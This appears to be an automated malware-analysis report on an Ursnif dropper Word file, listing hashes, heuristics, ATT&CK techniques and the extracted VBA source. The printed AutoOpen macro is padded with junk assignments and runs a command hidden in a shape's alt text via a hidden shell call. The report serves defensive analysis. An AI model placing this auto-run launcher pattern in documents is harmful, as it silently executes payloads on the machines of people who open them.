Ursnif Office (OLE) malware analysis — malicious · 17af821c262a61b4

MALICIOUS

Office (OLE)

75.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 06cd72ab4b97789007042d056f87d6f2 SHA-1: f849fb86889ecd3eea93112a219a7cbf6fe128b8 SHA-256: 17af821c262a61b46fcb14f6a61928dbec8723de0aedeaf643b2350fd8b3092e

142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for Ursnif. The macro is designed to execute automatically upon opening the document. While the exact download URL is obfuscated within the script, the presence of the AutoOpen macro and the ClamAV detection strongly indicate a dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3252 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3252 bytes
SHA-256: `72cf430cd0e4f9d1c1360ce4dbca44e022f3ece3535c5b04aa3122f9538b4c85`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jjebiwy" Sub AutoOpen() iRuuQ = 37603 tbexux = 47003 MaJmTIb = 19337 TWafILS = 2683 tnixif = 86364 slosuryly = 55670 AkZcWd = 12145 xzygeny = 41395 hpyn = 56840 qbokyxymig = 99769 xbTYNRFK = 43650 fqWlWJp = 88362 OQphb = 41707 qledizyzoq = 71715 mlyq = 83331 VQEqZblC = 69450 CgkIOhz = 65890 fcyqy = 58430 csenure = 83965 rnyxurovyf = 6700 ANOSoryK = 1325 rdVmyBqC = 34581 QqPmKq = 78970 qpyvyre = 34301 pzgauwbO = 7661 rfebetar = 61069 HJaWinI = 93939 jxycidis = 63478 nHXrS = 25980 CuuHEWb = 60341 dmuxo = 4668 tfewiboxobe = 10998 QsjhpxIe = 17946 dsUPB = 63325 kXpBtemy = 84985 daElD = 16211 QIhaOB = 29789 VufBtcoi = 27796 fwis = 89364 alikUxD = 5557 xHXqMxz = 24036 dhujowi = 95746 gtobo = 57238 iXQAR = 19785 zthVh = 12959 ccalu = ActiveDocument.Shapes("htufakehe").AlternativeText wzmcGGE = 95165 FNxlsrw = 71182 dZOuzOR = 64365 bDoBXp = 86304 WVHvLJ = 36709 zsylyky = 41518 XmWIjVlv = 17413 pvapisiwi = 84479 LcAyFzv = 39591 qwerakaky = 10431 yASSoQ = 17525 ceGyG = 46601 vOtOSWf = 2206 IQHyxc = 24135 nkob = 66772 atefF = 54830 dxicaqamuh = 41819 shKVNJHq = 29683 khubupecyt = 34136 rNSrW = 80465 zsevab = 90556 wcupunetucy = 54002 clHyjroB = 41143 mbgEN = 47766 mgyq = 27936 jmakanehe = 93658 UdPmaPS = 74414 vhowit = 26759 UkAid = 52470 vpycuva = 7449 frufo = 36401 tRJiU = 32066 ppoly = 56752 kzBvL = 76233 lsomihotaqi = 94466 xKCenfi = 82271 ZhoJCq = 29873 rcupucyxop = 14857 cqyc = 56702 bzedi = 90165 gtDEaC = 74703 lasNbbxW = 1000 JtbTYiED = 9218 SflylxFi = 16908 bpoped = 8385 Interaction.Shell% ccalu, vbHide lqojohahacu = 30118 vRCGEY = 30994 GeiPBCUv = 15406 YiPVJT = 23258 fzeruvazequ = 26966 ZpBMxY = 7994 wbuzibi = 46598 hjybiqej = 71840 RygcGXyQ = 31176 wsimapazuc = 89717 cwfoKlco = 78093 kpehidypupu = 45495 nrefira = 94583 RHvUmgQ = 26370 sVbTT = 1442 lhovi = 82493 pkofek = 86369 scekyl = 94648 nhecir = 54664 yfWfFO = 26809 jhahesi = 74198 xxyfilawivi = 22623 zkemo = 79547 tSaHTyU = 83223 yJfrec = 10008 VcQeb = 2724 HlVmB = 26978 pnivo = 83611 DRFlOM = 93808 AwqEZasG = 52257 mBtXZC = 36936 cqevi = 99940 LnPef = 97277 ZhcemGn = 95596 cwola = 18822 fwomamoduxy = 31462 uXGainu = 20482 zkekavequku = 83388 gycOXld = 43896 ywmJsAj = 81427 GcutzsQ = 4035 CXmenu = 87267 rrox = 26920 nWSeh = 57954 SsSlV = 66228 kbowozufiqe = 90087 lbyjufil = 24505 CINZfNEt = 90503 jxuquhiso = 40035 oRNYEad = 74586 ncybyqen = 85988 mhaqa = 56294 ddej = 46606 mfatorymuh = 13164 ZCEIi = 1066 OUnhtJir = 46222 ztydep = 46297 mpVHjD = 7727 tYOzJBPp = 86526 skhjEU = 39207 torMVyfI = 22399 jcican = 40440 ppgSKf = 84627 End Sub

SHA-256: 72cf430cd0e4f9d1c1360ce4dbca44e022f3ece3535c5b04aa3122f9538b4c85

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jjebiwy"
Sub AutoOpen()


iRuuQ = 37603

tbexux = 47003

MaJmTIb = 19337

TWafILS = 2683

tnixif = 86364
slosuryly = 55670

AkZcWd = 12145
xzygeny = 41395

hpyn = 56840

qbokyxymig = 99769

xbTYNRFK = 43650

fqWlWJp = 88362

OQphb = 41707

qledizyzoq = 71715
mlyq = 83331

VQEqZblC = 69450
CgkIOhz = 65890

fcyqy = 58430

csenure = 83965

rnyxurovyf = 6700

ANOSoryK = 1325

rdVmyBqC = 34581

QqPmKq = 78970
qpyvyre = 34301

pzgauwbO = 7661
rfebetar = 61069

HJaWinI = 93939

jxycidis = 63478

nHXrS = 25980

CuuHEWb = 60341

dmuxo = 4668

tfewiboxobe = 10998
QsjhpxIe = 17946

dsUPB = 63325
kXpBtemy = 84985

daElD = 16211

QIhaOB = 29789

VufBtcoi = 27796

fwis = 89364

alikUxD = 5557

xHXqMxz = 24036
dhujowi = 95746

gtobo = 57238
iXQAR = 19785

zthVh = 12959

ccalu = ActiveDocument.Shapes("htufakehe").AlternativeText


wzmcGGE = 95165

FNxlsrw = 71182

dZOuzOR = 64365

bDoBXp = 86304

WVHvLJ = 36709
zsylyky = 41518

XmWIjVlv = 17413
pvapisiwi = 84479

LcAyFzv = 39591

qwerakaky = 10431

yASSoQ = 17525

ceGyG = 46601

vOtOSWf = 2206

IQHyxc = 24135
nkob = 66772

atefF = 54830
dxicaqamuh = 41819

shKVNJHq = 29683

khubupecyt = 34136

rNSrW = 80465

zsevab = 90556

wcupunetucy = 54002

clHyjroB = 41143
mbgEN = 47766

mgyq = 27936
jmakanehe = 93658

UdPmaPS = 74414

vhowit = 26759

UkAid = 52470

vpycuva = 7449

frufo = 36401

tRJiU = 32066
ppoly = 56752

kzBvL = 76233
lsomihotaqi = 94466

xKCenfi = 82271

ZhoJCq = 29873

rcupucyxop = 14857

cqyc = 56702

bzedi = 90165

gtDEaC = 74703
lasNbbxW = 1000

JtbTYiED = 9218
SflylxFi = 16908

bpoped = 8385

Interaction.Shell% ccalu, vbHide


lqojohahacu = 30118

vRCGEY = 30994

GeiPBCUv = 15406

YiPVJT = 23258

fzeruvazequ = 26966
ZpBMxY = 7994

wbuzibi = 46598
hjybiqej = 71840

RygcGXyQ = 31176

wsimapazuc = 89717

cwfoKlco = 78093

kpehidypupu = 45495

nrefira = 94583

RHvUmgQ = 26370
sVbTT = 1442

lhovi = 82493
pkofek = 86369

scekyl = 94648

nhecir = 54664

yfWfFO = 26809

jhahesi = 74198

xxyfilawivi = 22623

zkemo = 79547
tSaHTyU = 83223

yJfrec = 10008
VcQeb = 2724

HlVmB = 26978

pnivo = 83611

DRFlOM = 93808

AwqEZasG = 52257

mBtXZC = 36936

cqevi = 99940
LnPef = 97277

ZhcemGn = 95596
cwola = 18822

fwomamoduxy = 31462

uXGainu = 20482

zkekavequku = 83388

gycOXld = 43896

ywmJsAj = 81427

GcutzsQ = 4035
CXmenu = 87267

rrox = 26920
nWSeh = 57954

SsSlV = 66228

kbowozufiqe = 90087

lbyjufil = 24505

CINZfNEt = 90503

jxuquhiso = 40035

oRNYEad = 74586
ncybyqen = 85988

mhaqa = 56294
ddej = 46606

mfatorymuh = 13164

ZCEIi = 1066

OUnhtJir = 46222

ztydep = 46297

mpVHjD = 7727

tYOzJBPp = 86526
skhjEU = 39207

torMVyfI = 22399
jcican = 40440

ppgSKf = 84627

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.